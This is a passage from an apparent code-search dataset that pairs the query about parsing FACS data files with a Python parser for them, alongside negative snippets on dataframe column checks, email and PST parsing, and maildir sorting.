self.xaxes:\n name = \"X\"\n else:\n name = \"Y\"\n raise Error(f\"the {name} axis column list is empty\")", "def test_columns_set_to_all_columns_when_none(self):\n\n df = d.create_df_1()\n\n x = BaseTransformer(columns=None)\n\n x.columns_set_or_check(X=df)\n\n h.assert_equal_dispatch(\n expected=list(df.columns.values),\n actual=x.columns,\n msg=\"x.columns set when None\",\n )", "def base_columns(self):\r\n _base_columns = set(self.all_columns).intersection(set(self.reqd_columns))\r\n return list(_base_columns)", "def test_set_col_names(self):\n self.dboard.set_col_names([\"A\", \"B\"])\n self.assertTrue(hasattr(self.dboard, \"_col_names\"))\n self.assertEqual(2, len(self.dboard._col_names))", "def missing_columns(self):\r\n _missing_columns = set(self.reqd_columns).difference(set(self.all_columns))\r\n return list(_missing_columns)", "def columns(self):\n return self.__column_list", "def test_set_col_names_exception(self):\n with self.assertRaises(ValueError) as ctx:\n self.dboard.set_col_names([\"A\", \"B\", \"C\"])\n\n self.assertEqual(\"'names' list size does not match the number of columns allocated\", str(ctx.exception))", "def columns(self):\n return NotImplemented", "def test_new_columns(self):\n rename = '{}*'\n expected = (list(self.df.columns) +\n list(rename.format(f) for f in self.formants))\n actual = self.normalizer(rename=rename, **self.kwargs).normalize(\n self.df).columns\n\n expected = sorted(expected)\n actual = sorted(actual)\n self.assertListEqual(actual, expected)", "def parse_column_names(x_col_set, user_col_set):\n complete_cols = set()\n for col in user_col_set:\n complete_cols |= set([s for s in x_col_set if isinstance(col, str) and\n re.search(f'{col}(?=[+$^-])|{col}(?=__)|(?<=[+$^-]){col}', s)])\n return user_col_set | complete_cols", "def cols_in_df(df, partial_col_names, not_present=None):\n\n present = set([col for col in df.columns\n for part in partial_col_names\n if part in col])\n if not_present:\n to_exclude = set([col for col in present\n for part in not_present\n if part in col])\n result = list(present.difference(to_exclude))\n else:\n result = list(present)\n return result", "def list_data(self, as_strings=False):\n if self.df is None:\n return [] \n if as_strings:\n return [str(col) for col in self.df.columns]\n else:\n return list(self.df.columns.values)", "def _check_columns(cdm_column_names, csv_columns, result):\n columns_valid = True\n\n # if len(csv_columns) != len(cdm_column_names):\n\n # check all column headers in the file\n for col in csv_columns:\n if col not in cdm_column_names:\n e = dict(message=MSG_INCORRECT_HEADER, column_name=col, actual=col)\n result['errors'].append(e)\n columns_valid = False\n\n # check cdm table headers against headers in file\n for col in cdm_column_names:\n if col not in csv_columns:\n e = dict(message=MSG_MISSING_HEADER, column_name=col, expected=col)\n result['errors'].append(e)\n columns_valid = False\n\n # check order of cdm table headers against headers in file\n for idx, col in enumerate(cdm_column_names):\n if idx < len(csv_columns) and csv_columns[idx] != col:\n e = dict(message=MSG_INCORRECT_ORDER,\n column_name=csv_columns[idx],\n actual=csv_columns[idx],\n expected=col)\n result['errors'].append(e)\n columns_valid = False\n break\n\n return columns_valid", "def _column_exists(self, tbname, colname):\n self._check_file(tbname)\n tb = tbtool()\n tb.open(tbname)\n cols = tb.colnames()\n tb.close()\n return (colname in cols)", "def _validate_cols(cols):\n\n\tif cols is not None and len(cols) < 2:\n\t\traise ValueError('too few features')", "def getSupportedColumnList( platformTarget, target, unifiedBLT=False):\n if unifiedBLT:\n columnList = [[key, \"YES\"] for key in bltFieldsDict.keys()]\n else:\n columnIndex = getColumnIndex(platformTarget, target)\n \n columnList = []\n breakpoint()\n for key, val in bltFieldsDict.items():\n columnList.append([key, val[columnIndex]])\n\n return columnList", "def test_columns_str_to_list(self):\n\n x = BaseTransformer(columns=\"a\")\n\n expected_attributes = {\"columns\": [\"a\"]}\n\n h.test_object_attributes(\n obj=x,\n expected_attributes=expected_attributes,\n msg=\"String put in list for columns\",\n )", "def validate_match_columns(import_log, field_names, model_class, header_row):\n errors = []\n column_matches = import_log.import_setting.columnmatch_set.all()\n for field_name in field_names:\n field_object, model, direct, m2m = model_class._meta.get_field_by_name(field_name)\n if (direct and\n model and\n not field_object.blank):\n field_matches = column_matches.filter(field_name=field_name)\n if field_matches:\n if field_matches[0].column_name not in header_row:\n errors += [\"{0} is required but is not in your spreadsheet. \".format(field_object.verbose_name)]\n else:\n errors += [\"{0} is required but has no match.\".format(field_object.verbose_name)]\n \n return errors", "def valid_col_tester(self, state):\n vert_state = self.cols(state)\n for line in vert_state:\n line_index = vert_state.index(line)\n vert_word = self.check_word(vert_state[line_index])\n if not(vert_word):\n return False\n return True", "def list_all_columns(data):\n\n # Print columns to user.\n print(\"\\nFeatures in our original dataset include (one at a time, please!):\")\n print(\"-\" * 30)\n print(\"\")\n\n # Print each column in our DataFrame.\n for index, column in enumerate(data.columns.values):\n print(\"[{}] {}\".format(index, column))\n time.sleep(0.20)", "def get_returns_columns(df: pd.DataFrame) -> list:\n return [col for col in df.columns if '_period_return' in col]", "def test_field_names(self):\n\n for mb_model in self.mb_model_list:\n mb_fields = mb_model._meta.fields\n db_cols = connection.introspection.get_table_description(\n self.cursor, mb_model._meta.db_table)\n\n for i in range(0, len(mb_model._meta.fields)):\n self.assertEqual(\n mb_fields[i].column,\n db_cols[i].name\n )", "def test_columns_empty_list_error(self):\n\n with pytest.raises(ValueError):\n\n BaseTransformer(columns=[])", "def get_cols(df):\n meta = get_metafeatures(df)\n categorical_columns = meta.loc[meta['type'] == 'object', 'column'].tolist()\n cols_to_drop = meta.loc[meta['missing'] > 0.5, 'column'].tolist()\n logging.debug('%s categorical columns found', len(categorical_columns))\n logging.debug('%s columns will be dropped', len(cols_to_drop))\n return categorical_columns, cols_to_drop", "def identify_columns(structure: dict):\n\tknown_columns = list()\n\n\t# collect columns\n\tfor day in structure['data']:\n\t\tfor key in day.keys():\n\t\t\tif key not in known_columns:\n\t\t\t\tknown_columns.append(key)\n\n\treturn known_columns", "def check_column_names(expected_headings, found_headings):\n column_missing = False\n column_additional = False\n\n # Check if column headings exist\n logging.info(\"Checking column headers are correct.\")\n diff_columns = set(expected_headings) - set(found_headings)\n if len(diff_columns) > 0:\n column_missing = True\n\n # Check whether there are any additional columns (could need renaming)\n extra_columns = set(found_headings) - set(expected_headings)\n if len(extra_columns) > 0:\n column_additional = True\n\n # Check for duplicate headings\n # NOTE: As mangle_dupe_cols=True, any duplicate columns will be stored in the form column.1.... column.N\n # We use this to avoid overwriting data. However, to identify duplicate original columns, we need to remove\n # these prior to checking for dups\n main_column_names = [i.split(\".\")[0] for i in found_headings]\n duplicate_headings = len(main_column_names) > len(set(main_column_names))\n if duplicate_headings:\n logging.error(\"Duplicate headings identified.\")\n if column_missing:\n logging.error(\"Missing headers identified:\")\n print(diff_columns)\n if column_additional:\n logging.error(\"Additional headers identified:\")\n print(extra_columns)\n if column_missing or column_additional or duplicate_headings:\n logging.info(\n \"File will not pass checks as I am unable to tell \"\n \"what to do with the columns on my own.\"\n )\n return False\n return True", "def get_column_names(self, table):\n try:\n logging.info(f'Getting column names of table `{table}`')\n return list(self.execute(f'SELECT * FROM `{table}`'))\n except:\n logging.exception('Something went wrong getting column names. Check trace.')\n return", "def _is_all_int(df_list: List[Union[dd.DataFrame, pd.DataFrame]], col: str) -> bool:\n for df in df_list:\n if col in df.columns:\n srs = df[col]\n if isinstance(srs, (dd.DataFrame, pd.DataFrame)):\n for dtype in srs.dtypes:\n if not is_integer_dtype(dtype):\n return False\n elif isinstance(srs, (dd.Series, pd.Series)):\n if not is_integer_dtype(srs.dtype):\n return False\n else:\n raise ValueError(f\"unprocessed type of data:{type(srs)}\")\n return True", "def old_column_list(self):\n return [\n col.name\n for col in self._old_table.column_list\n if col.name not in self.dropped_column_name_list\n ]", "def test_clean_columns():\n assert clean_columns('Id, AdCampaignId, CampaignId') == ['id', 'adCampaignId', 'campaignId']", "def _manage_cols(df, drop_list=[], name_dict={}):\n\n for colname in drop_list:\n if colname not in df:\n raise ValueError(f\"Can't drop column '{colname}' - '{colname}' does not exist in dataframe\")\n for colname in list(name_dict.keys()):\n if colname not in df:\n raise ValueError(f\"Can't rename '{colname}' to '{name_dict[colname]}' - '{colname}' does not exist in dataframe\")\n if colname in drop_list:\n raise ValueError(f\"Can't rename '{colname}' to '{name_dict[colname]}' - '{colname}' in drop_list\")\n\n column_names = np.setdiff1d(list(df.columns), list(name_dict.keys()))\n lower_columns = [name.lower().replace(' ','').replace('_','') for name in column_names]\n for i in range(len(column_names)):\n name_dict[column_names[i]] = lower_columns[i]\n \n df = df.drop(drop_list, axis=1)\n df = df.rename(columns=name_dict)\n \n return df", "def check_column_values(self, values):\n none_keys = sorted(list(self._necessary_input_columns.intersection(set([elem for elem in self._columns if values[self.column_id[elem]] in [None, 'None']]))))\n if len(none_keys) > 0:\n raise Exception('missing_keys in ForcingOnMesh_DBManager add function parameter file_info:\\n%s\\n'%('\\n'.join([' - %s'%elem for elem in none_keys])))", "def get_sample_colnames(ms_df: DF) -> List[str]:\n\n sample_numbers = get_sample_numbers(ms_df)\n\n target_sample_cols = list()\n for sample in sample_numbers:\n for col in SAMPLE_COLS:\n target_sample_cols.append('{attr}_{sample}'.format(attr=col, sample=sample))\n return target_sample_cols", "def _test_df_headers(self, df):\n assert list(df.columns.values) == [\n 'Appliances', 'BathroomsFull', 'BathroomsHalf', 'Bedrooms',\n 'DateListed', 'Description', 'MlsId', 'MlsName', 'Price',\n 'Rooms', 'StreetAddress'\n ]", "def _validate_columns(data, ip_column, lat_column, long_column, other_columns):\n if not ip_column and not (lat_column and long_column):\n raise ValueError(\n \"Data must have either an IpAddress ('ip_column')\",\n \"or latitude ('lat_column') and longitude ('long_column')\",\n )\n param_cols: List[str] = []\n for param in other_columns:\n if not param:\n continue\n if isinstance(param, list):\n param_cols.extend(param)\n else:\n param_cols.append(param)\n missing_columns = {col for col in param_cols if col not in data.columns}\n if missing_columns:\n raise LookupError(\n \"The following columns are not in the supplied DataFrame\",\n \",\".join(f\"'{col}'\" for col in missing_columns),\n )", "def test_columns_not_in_X_error(self):\n\n df = d.create_df_1()\n\n x = BaseTransformer(columns=[\"a\", \"z\"])\n\n with pytest.raises(ValueError):\n\n x.columns_check(X=df)", "def setRequiredColumns(self, colnames):\n # Make sure all column names are lower case so comparisons in _TableRow\n # are not case sensitive. From a modularity standpoint, this should be\n # done in _TableRow, but it is more efficient to do it here, since the\n # conversion need be done only once.\n self.required_cols = [colname.lower() for colname in colnames]", "def test_defined_table_columns(model):\n inst = inspect(model)\n columns_from_model = [c_attr.key for c_attr in inst.mapper.column_attrs]\n _, columns = run_mysql(f\"SELECT * FROM {model.__tablename__} LIMIT 1;\")\n\n assert len(columns) == len(columns_from_model)\n assert set(columns) == set(columns_from_model)", "def _these_columns_cannot_annotate_exp_cons(self):\n _cols = set([]) #\n for param_name, req_cols in self.required_columns.items():\n _cols |= req_cols\n\n return _cols | self.other_useful_columns", "def _listed_ea_column_check():\n for ea_row in unused_list:\n ddi_index = views_index[ea_row[15]]\n # This check is performed in\n # _ea_in_disposition_col0_and_empty_ipr_d_col\n if ea_row[0] in ea_ipr_d_values and \\\n 'IPR Designation' not in \\\n ddi_data[ddi_index][ea_row[1]]['extattrs']:\n continue\n # Update IPR D src column with ea_row[0] for processing.\n # WORK IN PROGRESS\n elif ea_row[0] in ea_ipr_d_values and 'IPR Designation' \\\n in ddi_data[ddi_index][ea_row[1]]['extattrs']:\n pass\n # Processing listable columns.\n for key, value in ea_index.items():\n # Skip's unused keys.\n if key not in ['Datacenter', 'IPR Designation']:\n continue\n # Check for blank column and blank source column.\n if key not in ddi_data[ddi_index][ea_row[1]]['extattrs'] and \\\n ea_row[value] in ['', 'DDI']:\n continue\n # Check for Disposition col, check for comma not in IPR D col\n # value, check value in IPR D col to ea ipr d attribute list,\n # check IPR D col value eq ddi value.\n # On not listed IPR D values.\n if key == 'IPR Designation':\n if ea_row[0] in ea_ipr_d_values \\\n and ',' not in ea_row[16] \\\n and ea_row[16] in ea_ipr_d_values:\n ea_row[16] = ea_row[16] + ',' + ea_row[0]\n import_override.append([ea_row[15].strip(),\n ea_row[1].strip(),\n ea_row[14].strip(),\n {key: ea_row[16]}])\n continue\n # Check for Disposition col, check for comma not in IPR D col\n # value, check value in IPR D col to ea ipr d attribute list,\n # check IPR D col value eq ddi value.\n # On not listed IPR D values.\n elif ea_row[0] in ea_ipr_d_values \\\n and ',' not in ea_row[16] \\\n and ea_row[16] not in ea_ipr_d_values:\n import_override.append([ea_row[15].strip(),\n ea_row[1].strip(),\n ea_row[14].strip(),\n {key: ea_row[0]}])\n continue\n# # Check Disposition col. and if IPR D listed value needs\n# # updating. On listed IPR D values.\n# if ea_row[0].lower().strip() in ea_ipr_d_values \\\n# and ',' in ea_row[16]:\n# temp_list = ea_row[16].split(',')\n# temp_list = [x.strip() for x in temp_list]\n# if ea_row[0].lower().strip() in temp_list:\n# continue\n# else:\n# temp_list.append(ea_row[0].lower().strip())\n# temp_dict_override.update({key: temp_list})\n# import_override.append([ea_row[15].strip(),\n# ea_row[1].strip(),\n# ea_row[14].strip(),\n# temp_dict_override])\n# continue\n\n # Builds dataset for non-listed values. Final Step.\n # If key not in ddi data and src value is not none.\n # Assign to merge.\n if key not in ddi_data[ddi_index][ea_row[1]]['extattrs'] \\\n and ea_row[value] not in ['', 'DDI']:\n import_merge.append([ea_row[15].strip(),\n ea_row[1].strip(),\n ea_row[14].strip(),\n {key: ea_row[value]}])\n continue\n # Checks diff against src value and a populated value in the\n # ddi data and replaces with src value.\n if ea_row[value] != \\\n ddi_data[ddi_index][\n ea_row[1]]['extattrs'][key]['value']:\n import_override.append([ea_row[15],\n ea_row[1],\n ea_row[14],\n {key: ea_row[value]}])\n continue", "def columns_to_fix(df):\n return [col for col in df.columns.values if any([k in col and v in col for k, v in symmetric_dihedrals.items()])]", "def getColumnsNames(self):\r\n ColsName = []\r\n for i in range(len(self.columns)):\r\n ColsName.append(self.columns[i].getColName())\r\n return ColsName", "def test_analyze_columns(self):\n\t\t\n\n\t\tdetails = self.watcher.analyze()\n\t\tself.assertEqual(isinstance(details, pd.DataFrame), True, \"details is a pandas DataFrame\")\n\n\t\tcolumns = \"layer_id,name,D,M,N,alpha,alpha_weighted,has_esd,lambda_max,layer_type,log_alpha_norm,log_norm,log_spectral_norm,norm,num_evals,rank_loss,rf,sigma,spectral_norm,stable_rank,sv_max,sv_min,xmax,xmin,num_pl_spikes,weak_rank_loss\".split(',')\n\t\tprint(details.columns)\n\t\tfor key in columns:\n\t\t\tself.assertTrue(key in details.columns, \"{} in details. Columns are {}\".format(key, details.columns))", "def old_non_pk_column_list(self):\n return [\n col.name\n for col in self._old_table.column_list\n if col.name not in self._pk_for_filter\n and col.name not in self.dropped_column_name_list\n ]", "def can_convert_to_column(obj):\n return is_column_like(obj) or cudf.api.types.is_list_like(obj)", "def has_headers(self):\n for column in self.columns:\n if column.header:\n return True\n return False", "def get_column_names(self):\n # here, creating combined column/volue column names for uniqueness\n colname_temp = list()\n for column in self.col_value:\n colname_temp.append(self.question_column + \"-\" + str(column))\n return colname_temp", "def _check_k_columns(self, k_columns):\n for k in k_columns:\n if k not in self.twiss_df:\n LOG.debug(\"Added {:s} with all zero to data-frame.\".format(k))\n self.twiss_df[k] = 0." ]
[ "0.7229939", "0.69595104", "0.6792466", "0.6648041", "0.66035503", "0.65919405", "0.65672946", "0.6438893", "0.64331186", "0.6377156", "0.6362247", "0.63079476", "0.62102634", "0.61988276", "0.6196506", "0.61454993", "0.61221856", "0.61137414", "0.61022323", "0.6095521", "0.6069956", "0.6036684", "0.6021152", "0.5997814", "0.5990277", "0.5921229", "0.5898715", "0.589218", "0.5876364", "0.58750707", "0.5874513", "0.58173513", "0.5806046", "0.57765913", "0.57737464", "0.57680345", "0.57489556", "0.5734497", "0.5724966", "0.56925505", "0.56912625", "0.5675511", "0.56651795", "0.56633675", "0.5660129", "0.56576043", "0.565638", "0.5648455", "0.5645078", "0.5639649", "0.5631919", "0.56221026", "0.56172425", "0.5607265", "0.5593567", "0.5591346", "0.5587462", "0.558097", "0.55793184", "0.5578368", "0.5574349", "0.5568527", "0.5568103", "0.55662787", "0.55595297", "0.5558219", "0.55567265", "0.5554074", "0.5551062", "0.5545752", "0.55278325", "0.5523803", "0.5523007", "0.5522622", "0.5521311", "0.55142576", "0.551021", "0.55083287", "0.55077827", "0.5507471", "0.5505484", "0.54972214", "0.54971844", "0.54883754", "0.5486603", "0.5480362", "0.5477621", "0.5477535", "0.5469004", "0.5463214", "0.54555124", "0.54520977", "0.54514027", "0.5449112", "0.5441633", "0.5440788", "0.54322976", "0.5431746", "0.5431378", "0.54293764" ]
0.83148104
0
Function for parsing the recipient folder for FACS data files.
def parse_facs_files(): #Load parser settings parser_settings = getattr(settings,'FACS_PARSER_SETTINGS') files_to_parse = [parser_settings['facs_source_directory']+f for f in os.listdir(parser_settings['facs_source_directory']) if '.exp' in f] for filename in files_to_parse: #Compute MD5 hash facs_file = file(filename,'rbU') md5hash = hashlib.md5(facs_file.read()).hexdigest() facs_file.close() #Skip file if previously parsed. if FacsFile.objects.filter(original_filename=filename,md5hash=md5hash): print 'Skipping ', filename continue #Open file, remove null bytes and prepare csv reader facs_file = file(filename, 'rU') csv_reader = csv.reader((x.replace('\0', '') for x in facs_file),dialect=csv.excel_tab) #Reader header csv_header = csv_reader.next() facs_file_results = [] #Parse the file for csv_row in csv_reader: if csv_row[0]: facs_file_results.append(dict(zip(csv_header,csv_row))) #Close the file facs_file.close() #Save the information to database and archive file random_ints = ''.join([str(random.randint(0,9)) for n in range(10)]) archive_filename = parser_settings['facs_archive_directory'] + filename.split('/')[-1][:-4].split('_')[0] + '_' + random_ints + '.exp' shutil.move(filename, archive_filename) facs_file = FacsFile( original_filename = filename, md5hash = md5hash, archive_filename = archive_filename, ) facs_file.save() #Remove empty elements for result in facs_file_results: for key, data in result.items(): if data == '.' or not(data): del result[key] #Cache test code and interface mappings test_codes = [] for testcode_mapping in TestCodeMapping.objects.filter(interface_name=parser_settings['testcode_interface_name']): test_code = testcode_mapping.code code = test_code.code code_mapping = testcode_mapping.code_mapping test_codes.append((code, code_mapping, test_code)) #Add results to database for result in facs_file_results: #Parse result date result_date = dateutil.parser.parse(result[parser_settings['result_datetime']]) result_error_code = getattr(result, parser_settings['error_codes'], '') result_identifier = result[parser_settings['sample_identifier']] result_cytometer = result[parser_settings['cytometer_serial']] #Create the dictionnary of result items. new_result_item_dict = {} for test_code, facs_file_column, test_code_object in test_codes: new_result_item_dict[test_code] = ResultItem( test_code = test_code_object, result_item_value = result[facs_file_column], error_code = result_error_code, result_item_datetime = result_date, ) #Search for possible duplicate result is_duplicate = False for possible_duplicate in FacsResult.objects.filter(result_identifier=result_identifier): if possible_duplicate.get_resultitem_dict() == new_result_item_dict: is_duplicate = True break #Save result and result item to data if it is not a duplicate if not is_duplicate: new_result = FacsResult( result_identifier=result_identifier, result_datetime=result_date, origin_facs_file=facs_file, cytometer_serial_number=result_cytometer, ) new_result.save() #Add the reference to the result for each item and save it to database. for item in new_result_item_dict.values(): item.result = new_result item.save() new_result.link_to_requisition()
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def main(pst_file):\n opst = pypff.open(pst_file)\n root = opst.get_root_folder()\n\n message_data = folder_traverse(root, [], **{'pst_name': pst_file, 'folder_name': 'root'})\n\n header = ['pst_name', 'folder_name', 'creation_time', 'submit_time', 'delivery_time',\n 'sender', 'subject', 'attachment_count']\n\n return message_data, header", "def check_for_messages(folder, message_data, pst_name, folder_name):\n for message in folder.sub_messages:\n message_dict = process_message(message)\n message_dict['pst_name'] = pst_name\n message_dict['folder_name'] = folder_name\n message_data.append(message_dict)\n return message_data", "def parseMboxFolder(folder):\n\n longform = re.compile(\"(^.*)(<)(.*)(>$)\")\n quoted = re.compile('\".*\"')\n\n formail_cmd = \"formail -s formail -c -z -x'To:' -x'CC:' -x'BCC' < %s\" % folder\n results = os.popen(formail_cmd, \"r\").readlines()\n\n addresses = set()\n for line in results:\n line = quoted.sub(\"\", line)\n for entry in line.split(\",\"):\n entry = entry.strip()\n match = longform.match(entry)\n if match is None:\n address = entry\n addresses.add(address)\n else:\n address = match.group(3)\n addresses.add(address)\n\n return addresses", "def build_dataset(data_set, home_dir, dir, unique_spam, spam_top_50):\n \n file_list = os.listdir(home_dir + dir)\n count = len(file_list)\n for file_name in file_list:\n data_set[file_name] = DataMember()\n #Ignore files that start with .\n if file_name[0] == '.' or os.path.isdir(home_dir + dir + '/' + file_name) or \\\n os.path.islink(home_dir + dir + '/' + file_name):\n continue \n #print file_name \n file = open(home_dir + dir + '/' + file_name)\n mail = email.message_from_file(file)\n file.close()\n \n #Extract information from header\n for key in mail.keys():\n #1.) IP Address from the received field in the header (Easy just read it)\n #Get the IP address of the last Received from field unless its 127.0.0.1\n if key == 'Received':\n address = re.search('(\\d{1,3}\\.){3}\\d{1,3}',mail[key]).group()\n if address != '127.0.0.1':\n data_set[file_name].ip_address_str += address + ' '\n \n #3.) Subject (Easy just read it) \n if key == 'Subject':\n data_set[file_name].subject_str = repr(mail[key])[1:-1]\n \n #4.) Name from the From field (Easy just read it)\n if key == 'From':\n data_set[file_name].from_name_str = repr(mail[key])[1:-1]\n \n #2.) Matching degree of domain names between Message-Id and (Received/From ??) field (Easy just read and compare)\n if mail['From'] != None:\n from_domain = re.search('@[\\[\\]\\w+\\.]+', mail['From'])\n else:\n from_domain = None;\n if str(from_domain) != 'None':\n from_domain = from_domain.group()[1:]\n else:\n #Non-ascii domain name, pull out the hex encoding\n from_domain = repr(mail['From']).replace('\\\\x','')\n if from_domain.find('@') == -1:\n from_domain = ' '\n else:\n from_domain = re.search('@[\\[\\]\\w+\\.]+', from_domain).group()[1:]\n message_domain = re.search('@[\\[\\]\\w+\\.]+',mail['Message-ID'])\n if str(message_domain) != 'None':\n message_domain = message_domain.group()[1:]\n else:\n #Non-ascii domain name, pull out the hex encoding\n message_domain = repr(mail['Message-ID']).replace('\\\\x','')\n message_domain = repr(mail['Message-ID']).replace('%','')\n if message_domain.find('@') == -1:\n message_domain = ' '\n else:\n message_domain = re.search('@[\\[\\]\\w+\\.]+', message_domain).group()[1:]\n \n distance = nltk.edit_distance(from_domain, message_domain)\n domain_len = max(len(from_domain), len(message_domain), 1) * 1.0\n \n data_set[file_name].degree_domains_match = 1.0 - distance / domain_len\n \n #Get the length of the message and the text\n length = (get_message_len(mail) * 1.0)\n body = get_message_body(mail)\n\n #5.) Content type (Easy just read it)\n data_set[file_name].type_HTML = get_type_content(mail)\n #6.) Attachments: none, text, or non-text \n data_set[file_name].attachments = get_type_attachments(mail)\n #7.) Number of URLs present \n urls = re.findall( \\\n 'http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\\(\\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+', \\\n body)\n data_set[file_name].num_urls = len(urls)\n \n #8.) URL ratio (% of message body that is URLs)\n data_set[file_name].percent_urls = len(''.join(urls)) / length\n \n #9.) SPAM word ratio \n #10.) SPAM degree as by equation in paper \n spam_count = 0\n w1 = 50 / 51.0\n w2 = 1 / 51.0\n freq_spam = 0.0\n s1 = 0.0\n s2 = 0\n \n body = nltk.clean_html(body)\n words = nltk.word_tokenize(body)\n word_count = max(1, len(words)) #Don't allow divide by zero\n for word in nltk.word_tokenize(body):\n if word in unique_spam:\n #Must be SPAM\n s2 = 1\n spam_count += 1\n elif word in spam_top_50:\n freq_spam += 1.0\n spam_count += 1\n \n s1 = freq_spam / word_count\n \n data_set[file_name].percent_spam = spam_count / length\n data_set[file_name].degree_spam = w1 * s1 + w2 * s2\n \n #11.) Classification label: Spam or Ham\n if file_name.startswith('ham'):\n data_set[file_name].spam = 1\n else:\n data_set[file_name].spam = 2\n #Fields that need to be md5 encoded are: IP address, Subject, and from \n ip_address_md5 = hashlib.md5()\n ip_address_md5.update(data_set[file_name].ip_address_str)\n data_set[file_name].ip_address = int(ip_address_md5.hexdigest(),16)\n \n subject_md5 = hashlib.md5()\n subject_md5.update(data_set[file_name].subject_str)\n data_set[file_name].subject = int(subject_md5.hexdigest(),16) \n \n from_name_md5 = hashlib.md5()\n from_name_md5.update(data_set[file_name].from_name_str)\n data_set[file_name].from_name = int(from_name_md5.hexdigest(),16) \n\n #for key in data_set.keys():\n # print data_set[key]\n return data_set\n #Repeat for ham files", "def fileExtract(tcp, friends, chats, posts):\n\n # if friends file exists open file and add friends user ids to friends dict\n if os.path.isfile('data/friends'):\n with open('data/friends') as f:\n for userid in f:\n friends[userid] = ('',0)\n\n # form server, get updated addresses for each friend\n for key in friends:\n tcp.sendMessage('SEARCH ' + key)\n address = tcp.receiveMessage().split()[-2:]\n address = (address[0], int(address[1]))\n friends[key] = (address)\n\n # if chats file exists open the file and add the data to chats dict\n if os.path.isfile('data/chats'):\n with open('data/chats') as f:\n for line in f:\n key, val = line.split()\n chats[key] = val\n\n # if posts file exists open the file and add the data to posts dict\n if os.path.isfile('data/posts'):\n with open('data/posts') as f:\n for line in f:\n templist = line.split()\n posts[templist[0]] = (templist[1], ' '.join(templist[2:]))", "def parse(self):\n\t\tfor part in self.mail.walk():\n\t\t\tself.process_part(part)", "def process(cfg):\n\n for section in cfg.sections():\n l = section.split(None, 1)\n if l[0] != 'depot':\n continue\n depot = l[1]\n depot = os.path.expanduser(depot)\n log.info('Depot %s', depot)\n\n def g():\n found = False\n for var, rules_name in cfg.items(section):\n l = var.split(None, 1)\n if l[0] != 'process':\n continue\n found = True\n incoming_folder = l[1]\n yield (incoming_folder, rules_name)\n if not found:\n yield ('incoming', 'incoming')\n\n for incoming_folder, rules_name in g():\n log.info(\n 'Incoming folder %r using rules %r',\n incoming_folder,\n rules_name,\n )\n incoming_path = os.path.join(depot, incoming_folder)\n for path in maildir.walk(incoming_path):\n # default folder if nothing matches\n folder = 'INBOX'\n\n for k,v in cfg.items('rules %s' % rules_name):\n k = k % dict(\n colon=':',\n equals='=',\n )\n log.debug('Rule %s = %s', k, v)\n l = k.split(None)\n name = l[0]\n\n data = matcher.call_matcher(\n name=name,\n cfg=cfg,\n depot=depot,\n folder=incoming_folder,\n path=path,\n args=l[1:],\n )\n\n if data is not None:\n log.debug('Matcher data: %r', data)\n folder = v.strip() % data\n break\n\n maildir.create(os.path.join(depot, folder))\n old_path = os.path.join(\n incoming_path,\n path,\n )\n new_path = os.path.join(\n depot,\n folder,\n path,\n )\n log.debug('Move %s to %s', old_path, new_path)\n try:\n os.rename(old_path, new_path)\n except OSError, e:\n if e.errno == errno.ENOENT:\n # lost a race\n pass\n else:\n raise", "def process_message(mail):\n\tmessage = email.message_from_string(mail)\t#parsing metadata\n\tdatetuple = email.utils.parsedate_tz(message.__getitem__('Date'))\n\tfiledirectory = basedirectory\n\tif not datetuple:\n\t\tdatetuple = email.utils.parsedate_tz(message.__getitem__('Delivery-date'))\n\tif directory_for_year: \n\t\tfiledirectory = os.path.join(filedirectory, str(datetuple[0]))\n\tif directory_for_month:\n\t\tfiledirectory = os.path.join(filedirectory, str(datetuple[1])) \n\tdateposix = email.utils.mktime_tz(datetuple)\n\tlocaldate = datetime.datetime.fromtimestamp(dateposix)\n\tdatestring = localdate.strftime('%Y%m%d-%H%M') # +'-'+'-'.join(time.tzname) #\n\tsender = email.utils.parseaddr(message['To'])[1].replace('@','_').replace('.','-')\n\tsubject = email.header.decode_header(message['Subject'])[0][0]\n\tfilename = datestring + '_' + sender[:60] + '_' + subject[:60]\n\n\t# parsing mail content\n\tmailstring = ''\n\tfor headername, headervalue in message.items():\n\t\tmailstring += headername + ': ' + headervalue + '\\r\\n'\t# add \\r\\n or\n\tif message.get_content_maintype() == 'text':\n\t\tmailstring += message.get_payload(decode=True)\n\n\t# handle multipart: \n\telif message.get_content_maintype() == 'multipart':\n\t\tpartcounter = 0\n\t\tfor part in message.walk():\n\t\t\tif part.get_content_maintype() == 'text':\t# also: text/html\n\t\t\t\tfor header, value in part.items():\n\t\t\t\t\tmailstring += header + ': ' + value + '\\r\\n'\n\t\t\t\t\tmailstring += '\\r\\n' + part.get_payload(decode=True) + '\\r\\n'\n\t\t\t# skip multipart containers\n\t\t\telif part.get_content_maintype() != 'multipart':\n\t\t\t\tpartcounter += 1\n\t\t\t\ttry:\n\t\t\t\t\tattachmentname = email.header.decode_header(part.get_filename())[0][0]\n\t\t\t\texcept:\n\t\t\t\t\tattachmentname = \"\"\n\t\t\t\t\tprint(\"Error when parsing filename.\")\n\t\t\t\tif not attachmentname:\n\t\t\t\t\text = mimetypes.guess_extension(part.get_content_type())\n\t\t\t\t\tif not ext:\n\t\t\t\t\t\text = '.bin'\t# use generic if unknown extension\n\t\t\t\t\tattachmentname = 'attachment' + str(partcounter) + ext\n\t\t\t\tattfilename = filename + '_' + attachmentname\n\t\t\t\twrite_to_file(filedirectory, attfilename, part.get_payload(decode=True))\n\twrite_to_file(filedirectory, filename+'.txt', mailstring)", "def _parse_cvcfolder(self, cvcfolderpath):\n cvcfoldername = os.path.basename(os.path.abspath(cvcfolderpath))\n obsfolderinfo = {}\n cvcextstr = cvcfoldername.split('_')[-1]\n if cvcextstr == 'xst' or cvcextstr == 'xst-SEPTON':\n cvcfoldername_split = cvcfoldername.split('_')\n try:\n (stnid, Ymd, HMS, rcustr, sbstr, intstr, durstr, dirstr, cvcextstr\n ) = cvcfoldername_split\n obsfolderinfo['stnid'] = stnid\n obsfolderinfo['datetime'] = datetime.datetime.strptime(\n Ymd + 'T' + HMS, '%Y%m%dT%H%M%S')\n obsfolderinfo['rcumode'] = rcustr[3:]\n obsfolderinfo['subband'] = sbstr[2:]\n obsfolderinfo['integration'] = float(intstr[3:])\n obsfolderinfo['duration_tot'] = float(durstr[3:])\n obsfolderinfo['pointing'] = dirstr[3:].split(',')\n except:\n raise ValueError(\"Foldername not in xst_ext format.\")\n elif cvcextstr == 'acc':\n dirpat = 